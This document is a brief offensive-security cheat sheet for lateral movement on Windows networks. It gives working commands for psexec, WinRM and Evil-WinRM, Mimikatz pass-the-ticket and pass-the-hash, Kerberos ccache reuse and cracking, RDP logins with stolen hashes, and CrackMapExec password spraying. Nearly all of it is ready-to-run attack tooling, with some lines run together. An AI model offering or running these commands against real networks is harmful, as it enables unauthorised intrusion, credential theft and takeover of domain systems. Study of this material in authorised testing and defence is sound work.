Lateral Movement
There aren't many ways to move laterally on windows. Below are the main ones.
psexec
RDP
WinRM
SSH(not likely)
PTH(pass the hash) can be used most of the time.
Mimikatz Ticket PTT
Enable-PSRemoting
mimikatz.exe '" kerberos:ptt C:\Users\Public\ticketname.kirbi"' "exit"
Enter-PSSession -ComputerName ECORPWinRM
$pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('ECORP.local\morph3', $pass)
Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }
# Evil-WinRM
https://github.com/Hackplayers/evil-winrm
ruby evil-winrm.rb -i 192.168.1.2 -u morph3 -p morph3 -r evil.corpPTH with Mimikatz
Invoke-Mimikatz -Command '"sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:command"'Pass The Ccache (PTC)
Grab the ccache from remote and put into environment variable
export KRB5CCNAME=/home/morph3/Desktop/krb5cc_012345678_XXXXMake sure the times are synced up with the DC
sudo ntpdate -u 192.168.1.231Psexec to the target
impacket-psexec [email protected] -dc-ip 192.168.1.231 -k -no-pass** Don't include domain name in psexec. If you are having issues with the command you may remove the username as well.
Cracking Ccache
Convert the ccache file into kirbi file using a converter.
python2 /opt/ticket_converter/ticket_converter.py krb5cc_012345678_XXXX ticket.kirbiConvert kirbi to crackable hash.
python3 /opt/kerberoast/kirbi2john.py ticket.kirbi | tee ticket_hash.txtRDP
Impacket's rdp_check.py script is good.
impacket-rdp_check morph3:[email protected]
python3 /opt/impacket/examples/rdp_check.py ecorp/[email protected]xfreerdp /u:morph3 /p:Password123 /v:1.3.3.7
xfreerdp /u:morph3 /pth:08df3c74ded740e1f2bcf5dea4b8daf6 /v:1.3.3.7
rdesktop 1.3.3.7 -u Administrator -p 123456CrackMapExec
Swiss-knife tool for password spraying.
crackmapexec smb ./ips.txt -u ./users -H hashes --local-auth
crackmapexec smb 1.3.3.7 -u ./users -p ./passwords --continue-on-success --sharesLast updated